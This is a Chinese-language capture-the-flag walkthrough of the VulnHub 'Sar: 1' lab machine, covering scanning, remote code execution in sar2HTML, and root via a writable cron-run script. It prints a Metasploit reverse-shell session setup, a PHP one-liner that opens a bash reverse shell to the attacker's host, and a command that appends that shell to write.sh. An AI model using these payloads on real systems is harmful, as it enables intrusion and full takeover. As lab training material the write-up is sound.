介绍
系列:Sar(此系列共1台)
发布日期:2020 年 2 月 15 日
难度:初级
运行环境:VMware
目标:取得Root权限
学习:
- nmap漏扫脚本
- 目录爆破
- 远程代码执行
- 计划任务提权
靶机地址:https://www.vulnhub.com/entry/sar-1,425/
信息收集
netdiscover主机发现
sudo netdiscover -i eth0 -r 192.168.229.0/24
主机信息探测
nmap -p- 192.168.229.142
nmap -p 80 -A 192.168.229.142
nmap -p 80 --script=vuln 192.168.229.142
网站探测
打开网站就是一个Apache的默认页面,只好目录爆破,发现的结果与nmap探测的差不多,尝试把robots.txt中的内容当作子目录进行爆破。
dirsearch -u http://192.168.229.142/sar2HTML/ --full-url -x 404,403
这玩意看着像个cms啥的,漏洞库里面搜一下
发现存在远程代码执行漏洞
根据漏洞描述看一下,发现果然命令执行了
远程代码执行
介绍2种方式
方式1:MSF
执行的命令就是msf生成的那长串内容
use exploit/multi/script/web_delivery
show options
show targets
set target 1
set payload php/meterpreter/reverse_tcp
set LHOST 192.168.229.128
exploit
sessions -i 1
shell
python3 -c 'import pty; pty.spawn("/bin/bash")'
方式2:一句话木马反弹shell
创建一个web服务,里面让靶机下载木马
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.229.128/4455 0>&1'"); ?>
然后访问木马地址,网站会加载运行它,反弹shell成功
计划任务提权
简单搜索后,发现上一级目录中存在两个有趣的文件,阅读文件内容后发现突破口在“finally.sh”上,于是搜一下。发现有个计划任务:
这个计划任务的作用是每隔 5 分钟以 root 用户权限执行 /var/www/html/ 目录下的 finally.sh 脚本。而 finally.sh 脚本调用的 write.sh 脚本,我是有权限写的,所以这就是一个计划任务提权漏洞。
# 在根目录以递归方式查找文件名中包含 AVApplication.py 的所有文件,并输出文件名及相应行号
grep -rnw '/' -e 'finally.sh' 2> /dev/null
写入反弹shell的bash脚本:
echo "bash -c 'bash -i >& /dev/tcp/192.168.229.128/4455 0>&1'" >> /var/www/html/write.sh
等待会就可以拿到反弹来的shell